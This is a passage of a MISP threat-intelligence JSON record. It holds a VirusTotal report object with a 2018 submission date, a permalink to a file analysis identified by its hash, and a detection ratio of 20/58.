"template_version": "2",
|
|
"timestamp": "1537334493",
|
|
"uuid": "871efca7-2ad6-4bfe-a116-dcd8cf14fb6a",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334493",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "2b1a7a8f-99fc-4684-98e7-f38d718555a8",
|
|
"value": "2018-09-18T12:02:50"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334494",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "7d67a45d-37b8-4972-93be-68eb79124851",
|
|
"value": "https://www.virustotal.com/file/09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885/analysis/1537272170/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334494",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "f916ec81-9212-4dc6-bef9-dc7982bd15a3",
|
|
"value": "20/58"
|
|
}
|
|
]
|
|
}
|
|
]
|
|
}
|
|
} |